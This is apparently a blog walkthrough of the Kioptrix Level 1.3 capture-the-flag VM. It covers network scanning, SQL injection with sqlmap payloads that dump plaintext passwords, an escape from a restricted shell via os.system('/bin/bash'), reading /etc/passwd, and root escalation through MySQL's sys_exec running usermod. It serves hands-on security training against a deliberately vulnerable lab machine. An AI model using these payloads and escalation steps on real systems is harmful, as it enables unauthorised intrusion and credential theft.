Kioptrix: Level 1.3 (#4) – Walkthrough

This is the final box of the Kioptrix series.Last 3 box is sample and nice but this one is little more harder than older box.Ok. talk is cheap.

Start scanning my network with netdiscover.

┌─[[email protected]]─[~/Desktop]
└──> netdiscover
 Currently scanning: 192.168.20.0/16   |   Screen View: Unique Hosts                              
                                                                                                  
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                  
 _____________________________________________________________________________ 
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     60:e3:27:be:75:78      1      60  TP-LINK TECHNOLOGIES CO.,LTD.                  
 192.168.1.70    08:00:27:c8:67:ee      1      60  PCS Systemtechnik GmbH                         
 192.168.1.100   34:97:f6:c3:0b:66      1      60  ASUSTek COMPUTER INC.

Target ip is 192.168.1.1, Normally scan the target with nmap version detected.

┌─[✗]─[[email protected]]─[~/Desktop]
└──> nmap -sV 192.168.1.70

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 09:33 +0630
Nmap scan report for 192.168.1.70
Host is up (0.00024s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:C8:67:EE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.17 seconds

Let’s me check http first and scan dir dir with dirb.

┌─[✗]─[[email protected]]─[~/Desktop]
└──> dirb http://192.168.1.70 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jan  8 09:34:46 2018
URL_BASE: http://192.168.1.70/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.70/ ----
+ http://192.168.1.70/cgi-bin/ (CODE:403|SIZE:327)                                                                   
==> DIRECTORY: http://192.168.1.70/images/                                                                           
+ http://192.168.1.70/index (CODE:200|SIZE:1255)                                                                     
+ http://192.168.1.70/index.php (CODE:200|SIZE:1255)                                                                 
==> DIRECTORY: http://192.168.1.70/john/                                                                             
+ http://192.168.1.70/logout (CODE:302|SIZE:0)                                                                       
+ http://192.168.1.70/member (CODE:302|SIZE:220)                                                                     
+ http://192.168.1.70/server-status (CODE:403|SIZE:332)                                                              
                                                                                                                     
-----------------
END_TIME: Mon Jan  8 09:34:48 2018
DOWNLOADED: 4612 - FOUND: 6

I found the login page and try with sql login query bypass.

Username admin and password is ‘ (single quote). it show the sql error. I understand that it is sql vulnerable to exploit.

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28
Wrong Username or Password

now open sqlmap and grep all data from database;

┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --current-db
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:39:48

[09:39:50] [INFO] resuming back-end DBMS 'mysql' 
[09:39:50] [INFO] testing connection to the target URL
[09:39:50] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:39:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:39:50] [INFO] fetching current database
[09:39:50] [INFO] resumed: members
current database:    'members'
[09:39:50] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70'

[*] shutting down at 09:39:50

Grep table from member database;

┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --tables -D members
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.12#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:40:40

[09:40:40] [INFO] resuming back-end DBMS 'mysql' 
[09:40:40] [INFO] testing connection to the target URL
[09:40:40] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:40:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:40:40] [INFO] fetching tables for database: 'members'
[09:40:40] [INFO] fetching number of tables for database 'members'
[09:40:40] [INFO] resumed: 1
[09:40:40] [INFO] resumed: members
Database: members
[1 table]
+---------+
| members |
+---------+

[09:40:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70'

[*] shutting down at 09:40:40

Grep columns from members table

┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --columns -T members -D members
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:41:41

[09:41:42] [INFO] resuming back-end DBMS 'mysql' 
[09:41:42] [INFO] testing connection to the target URL
[09:41:42] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:41:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:41:42] [INFO] fetching columns for table 'members' in database 'members'
[09:41:42] [INFO] resumed: 3
[09:41:42] [INFO] resumed: id
[09:41:42] [INFO] resumed: int(4)
[09:41:42] [INFO] resumed: username
[09:41:42] [INFO] resumed: varchar(65)
[09:41:42] [INFO] resumed: password
[09:41:42] [INFO] resumed: varchar(65)
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(4)      |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+

[09:41:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.70'

[*] shutting down at 09:41:42

Final dump the data from columns.

┌─[[email protected]]─[~/Desktop]
└──> sqlmap -u "http://192.168.1.70/checklogin.php" --data="myusername=admin&mypassword=admin&Submit=Login" -p mypassword --dump -C username,password -T members -D members
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:42:24

[09:42:24] [INFO] resuming back-end DBMS 'mysql' 
[09:42:24] [INFO] testing connection to the target URL
[09:42:24] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=jDWI&mypassword=-8663' OR 3851=3851#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=jDWI&mypassword=' OR SLEEP(5)-- tKEJ&Submit=Login
---
[09:42:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:42:24] [INFO] fetching entries of column(s) 'password, username' for table 'members' in database 'members'
[09:42:24] [INFO] fetching number of column(s) 'password, username' entries for table 'members' in database 'members'
[09:42:24] [INFO] resumed: 2
[09:42:24] [INFO] resumed: ADGAdsafdfwt4gadfga==
[09:42:24] [INFO] resumed: robert
[09:42:24] [INFO] resumed: MyNameIsJohn
[09:42:24] [INFO] resumed: john
Database: members
Table: members
[2 entries]
+----------+-----------------------+
| username | password              |
+----------+-----------------------+
| robert   | ADGAdsafdfwt4gadfga== |
| john     | MyNameIsJohn          |
+----------+-----------------------+

we already notice ssh open. So try to login with this info. Remember all password to try login to get the flag more faster.

└──> ssh [email protected]
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ ls -al
total 24
drwxr-xr-x 2 robert robert 4096 2012-02-04 18:53 .
drwxr-xr-x 5 root   root   4096 2012-02-04 18:05 ..
-rw-r--r-- 1 robert robert  220 2012-02-04 18:05 .bash_logout
-rw-r--r-- 1 robert robert 2940 2012-02-04 18:05 .bashrc
-rw-r--r-- 1 robert robert    5 2012-02-04 18:59 .lhistory
-rw-r--r-- 1 robert robert  586 2012-02-04 18:05 .profile
robert:~$ cat /etc/passwd
*** unknown command: cat
robert:~$ 

Login success but not working well, so i try to bypass the shell. echo os.system(‘/bin/bash’)

robert:~$ echo os.system('/bin/bash')
[email protected]:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell

Yes it work. Awesome 😉 . and add some fixed to work well for terminal.

[email protected]:/$ clear
'xterm-256color': unknown terminal type.
[email protected]:/$ export TERM=xterm
[email protected]ix4:/var/www$ ls -al
total 44
drwxr-xr-x  5 root root 4096 2018-01-07 21:55 .
drwxr-xr-x 14 root root 4096 2012-02-04 09:57 ..
-rw-r--r--  1 root root 1477 2012-02-06 11:31 checklogin.php
-rw-r--r--  1 root root  298 2012-02-04 11:11 database.sql
drwxr-xr-x  2 root root 4096 2012-02-06 11:44 images
-rw-r--r--  1 root root 1255 2012-02-06 12:07 index.php
drwxr-xr-x  2 root root 4096 2012-02-04 18:33 john
-rw-r--r--  1 root root  176 2012-02-04 12:39 login_success.php
-rw-r--r--  1 root root   78 2012-02-04 11:33 logout.php
-rw-r--r--  1 root root  606 2012-02-06 15:42 member.php
drwxr-xr-x  2 root root 4096 2012-02-04 18:30 robert
[email protected]:/var/www$ cat checklogin.php | head -n 6
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name

Now i know the mysql password is empty with user root. In this step, i try to root the kernel  but gcc not install.  So let’s try another method. I search the process that running with root access.

[email protected]:/var/www$ ps -ef | grep root
root         1     0  0 21:58 ?        00:00:00 /sbin/init
root         2     0  0 21:58 ?        00:00:00 [kthreadd]
root         3     2  0 21:58 ?        00:00:00 [migration/0]
root         4     2  0 21:58 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 21:58 ?        00:00:00 [watchdog/0]
root         6     2  0 21:58 ?        00:00:00 [events/0]
root         7     2  0 21:58 ?        00:00:00 [khelper]
root        41     2  0 21:58 ?        00:00:00 [kblockd/0]
root        44     2  0 21:58 ?        00:00:00 [kacpid]
root        45     2  0 21:58 ?        00:00:00 [kacpi_notify]
root        90     2  0 21:58 ?        00:00:00 [kseriod]
root       129     2  0 21:58 ?        00:00:00 [pdflush]
root       130     2  0 21:58 ?        00:00:00 [pdflush]
root       131     2  0 21:58 ?        00:00:00 [kswapd0]
root       173     2  0 21:58 ?        00:00:00 [aio/0]
root      1265     2  0 21:58 ?        00:00:00 [ata/0]
root      1268     2  0 21:58 ?        00:00:00 [ata_aux]
root      1277     2  0 21:58 ?        00:00:00 [scsi_eh_0]
root      1280     2  0 21:58 ?        00:00:00 [scsi_eh_1]
root      1299     2  0 21:58 ?        00:00:00 [ksuspend_usbd]
root      1306     2  0 21:58 ?        00:00:00 [khubd]
root      2026     2  0 21:58 ?        00:00:00 [scsi_eh_2]
root      2238     2  0 21:58 ?        00:00:00 [kjournald]
root      2405     1  0 21:58 ?        00:00:00 /sbin/udevd --daemon
root      2654     2  0 21:58 ?        00:00:00 [kpsmoused]
root      3927     1  0 21:58 tty4     00:00:00 /sbin/getty 38400 tty4
root      3928     1  0 21:58 tty5     00:00:00 /sbin/getty 38400 tty5
root      3932     1  0 21:58 tty2     00:00:00 /sbin/getty 38400 tty2
root      3934     1  0 21:58 tty3     00:00:00 /sbin/getty 38400 tty3
root      3937     1  0 21:58 tty6     00:00:00 /sbin/getty 38400 tty6
root      3995     1  0 21:58 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4016     1  0 21:58 ?        00:00:00 /usr/sbin/sshd
root      4072     1  0 21:58 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      4114  4072  0 21:58 ?        00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root -
root      4116  4072  0 21:58 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4189     1  0 21:58 ?        00:00:00 /usr/sbin/nmbd -D
root      4191     1  0 21:58 ?        00:00:00 /usr/sbin/smbd -D
root      4205  4191  0 21:58 ?        00:00:00 /usr/sbin/smbd -D
root      4206     1  0 21:58 ?        00:00:00 /usr/sbin/winbindd
root      4219  4206  0 21:58 ?        00:00:00 /usr/sbin/winbindd
root      4238     1  0 21:58 ?        00:00:00 /usr/sbin/cron
root      4260     1  0 21:58 ?        00:00:00 /usr/sbin/apache2 -k start
root      4317     1  0 21:58 tty1     00:00:00 /sbin/getty 38400 tty1
root      4390  4016  0 22:22 ?        00:00:00 sshd: robert [priv]
robert    4445  4395  0 22:29 pts/0    00:00:00 grep root

yes. I found mysql is running as root access.

root      4114  4072  0 21:58 ?        00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root -

Ok Try to login at mysql.

[email protected]:/var/www$ mysql -h localhost -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 16
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| members            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql> 

it work and i search google how to root from mysql. and i found the nice trick

https://thehackernews.com/2016/11/mysql-zero-day-exploits.html

Mysql also can run as terminal with sys_exec function. So i try to add root permission to my current account.

select sys_exec('usermod -a -G admin robert');

Got Root!. Nice trick and love to root. Finally, we need to show POC  to read flag file.

[email protected]:/var/www# cd /root/
[email protected]:~# ls -al
total 44
drwxr-xr-x  4 root       root       4096 2012-02-06 18:46 .
drwxr-xr-x 21 root       root       4096 2012-02-06 18:41 ..
-rw-------  1 root       root        254 2018-01-07 21:56 .bash_history
-rw-r--r--  1 root       root       2227 2007-10-20 07:51 .bashrc
-rw-r--r--  1 root       root        625 2012-02-06 10:48 congrats.txt
-rw-r--r--  1 root       root          1 2012-02-05 10:38 .lhistory
drwxr-xr-x  8 loneferret loneferret 4096 2012-02-04 17:01 lshell-0.9.12
-rw-------  1 root       root          1 2012-02-05 10:38 .mysql_history
-rw-------  1 root       root          5 2012-02-06 18:38 .nano_history
-rw-r--r--  1 root       root        141 2007-10-20 07:51 .profile
drwx------  2 root       root       4096 2012-02-06 11:43 .ssh
[email protected]:~# cat congrats.txt 
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

[email protected]:~# 

Thanks for reading. Happy Hacking..